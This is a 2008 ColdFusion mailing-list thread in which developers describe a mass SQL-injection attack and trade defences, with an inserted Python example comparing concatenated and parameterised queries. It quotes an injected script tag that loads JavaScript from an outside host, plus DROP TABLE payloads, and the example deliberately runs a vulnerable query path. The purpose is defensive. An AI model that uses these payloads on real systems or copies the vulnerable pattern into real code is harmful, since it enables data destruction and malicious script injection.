http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310339
> Yes, I alerted my bosses to this at the time and unfortunately nothing
> was done - we were too pressed for time. We now have 4 people going
> through the site patching up all the vulnerable queries.
It's sad but true that security holes are never seen as important until it's
(almost) too late.
--
Tom Chiverton
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310337
Yes, I alerted my bosses to this at the time and unfortunately nothing
was done - we were too pressed for time. We now have 4 people going
through the site patching up all the vulnerable queries.
Dominic
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310336
> It appears we've been attacked by this last night / this morning too.
Various people have been warning in the last few weeks that this sort of
scatter gun approach that started with ASP-based sites is now migrating to
ColdFusion powered ones.
--
Tom Chiverton
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310332
It appears we've been attacked by this last night / this morning too.
Will update here with more info when we have it.
Dominic
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310331
There are a number of things you can do, and in fact i use all of these -
[A] Find out this person's ip address, and if the form is submitted
from that ip address, do nothing. Don't give them any kind of
feedback at all. That'll stop this current attack, but since these
idiots usually dart from one IP address to another, it's not enough to
fix the problem. It'll only stop today's. You can find out the IP address
by having your form submit #cgi.remote_addr# in a hidden field.
[B] pass the form's submitted contents through a regex to eliminate
any html. You can get all kinds of string manipulation scripts
through the library at cflib.org, including one to strip out any html
[C] use cfformprotect, which (amongst other things) compares the
submission in this form with a database of other form submissions from
other sites, and identifies which ones are spam and which aren't.
When it tells you this is spam, you just throw it away. Don't tell
the spammer you're throwing it away, because that only helps them
refine their techniques. Those buggers are agile enough as it is
without us giving them a helping hand.
You can get cfformprotect from http://www.riaforge.org/ .
[D] while you're working in this area, you should make sure you're
using <cfqueryparam if you're processing the form into your database.
I know you haven't described a SQL injection, but it's not a million
miles away from what you do describe. There's ample documentation in
the ColdFusion docs about <cfqueryparam and there have been quite a
few blog articles about it lately. Google for cfqueryparam and
ColdFusion and you'll find them. Use <cfqueryparam on every (and I
do mean EVERY) parameter you insert into the database, on every insert
or update if there is likely to be any user input going in that SQL
statement. That ensures that you won't get anyone able to enter a
last name as 'Smith)';drop table users' or some such.
I started defending my sites from this kind of script when I had a
guestbook on a very low volume site suddenly get 30,000 entries waiting for
editor approval, all with links to sites we might want to go and see,
just like yours has. Using the techniques I described reduced the
flow from thousands a day to a more likely 3-4 a week on this little
site.
Hope this helps.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto
<michael.suwanto@724.com.au> wrote:
----- Excess quoted text cut - see Original Post for more -----
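To make point [D] above concrete, and Tom Chiverton's companion point about htmlEditFormat() on output and Mark Kruger's step of cleaning an already-poisoned table, here is an added example that is not code from this thread or from any of the posters. It uses Python's sqlite3 so it runs anywhere: because sqlite3.execute() refuses stacked statements, the vulnerable path calls executescript() to stand in for a driver that runs a whole batch, as SQL Server did in the attacks being discussed. The users and products tables, the last_name and image columns, the host example.invalid and the adapted payload string are all assumptions made for this example; the stored value mirrors the shape Michael reports finding in his database.

```python
# Added example, not from the thread: string concatenation versus a bound parameter
# (the cfqueryparam equivalent), cleanup of a poisoned column, and escaping on output.
# Table/column names, the payload and example.invalid are made up for this example.
import html
import re
import sqlite3

SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, last_name TEXT);
CREATE TABLE products (id INTEGER PRIMARY KEY, image TEXT);
"""

# Adapted from the last-name payload in the post above
PAYLOAD = "Smith');DROP TABLE users;--"
# The shape of the value Michael found in his table, with a placeholder host
INJECTED_IMAGE = 'Gisella427.jpg"></title><script src="http://example.invalid/w.js"></script><!--'
INJECTED_TAG_RE = re.compile(r'"></title><script src="[^"]*"></script><!--$', re.IGNORECASE)


def fresh_db():
    """In-memory database with one already-poisoned product row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO products (image) VALUES (?)", (INJECTED_IMAGE,))
    return conn


def insert_user_concatenated(conn, last_name):
    """The 'before' form: user input is spliced straight into the SQL text."""
    sql = "INSERT INTO users (last_name) VALUES ('" + last_name + "');"
    conn.executescript(sql)  # batch-capable driver stand-in; the payload's ';' ends the INSERT


def insert_user_parameterised(conn, last_name):
    """The cfqueryparam equivalent: the value is bound, never parsed as SQL."""
    conn.execute("INSERT INTO users (last_name) VALUES (?)", (last_name,))


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def strip_injected_tag(value):
    """One-off cleanup of a poisoned column; only holds once the queries are fixed."""
    return INJECTED_TAG_RE.sub("", value)


def render_image_cell(value):
    """htmlEditFormat() equivalent: escape on output so stored markup is shown, not run."""
    return '<img src="' + html.escape(value, quote=True) + '">'


def demo():
    results = {}
    conn = fresh_db()
    insert_user_concatenated(conn, PAYLOAD)
    results["users_survives_concat"] = table_exists(conn, "users")  # False: table dropped

    conn = fresh_db()
    insert_user_parameterised(conn, PAYLOAD)
    results["users_survives_param"] = table_exists(conn, "users")   # True
    results["stored_last_name"] = conn.execute("SELECT last_name FROM users").fetchone()[0]

    conn.execute("UPDATE products SET image = ?", (strip_injected_tag(INJECTED_IMAGE),))
    results["cleaned_image"] = conn.execute("SELECT image FROM products").fetchone()[0]
    results["escaped_output"] = render_image_cell(INJECTED_IMAGE)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

With the bound parameter the whole payload lands in last_name as a harmless string, which is also why the escaping step still matters: a bound value can legitimately contain '<script>', and only escaping at output time keeps it from running in a visitor's browser. The cleanup regex is tied to the exact tag shape shown; if the reinjection keeps coming every twenty minutes, as in Michael's report, the column will be poisoned again until every query takes the parameterised path.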
Author: Michael Suwanto
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310330
I'm a ColdFusion noob and my database just got injected with some script.
So for example one of the database field would appear something like so:
Gisella427.jpg"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--
I've tried updating the records using a replace command on the fields, but 20 minutes
later this code pops up again!!!
Any idea on how to fix or prevent this from happening????
Seriously out of idea here....
May 25, 2013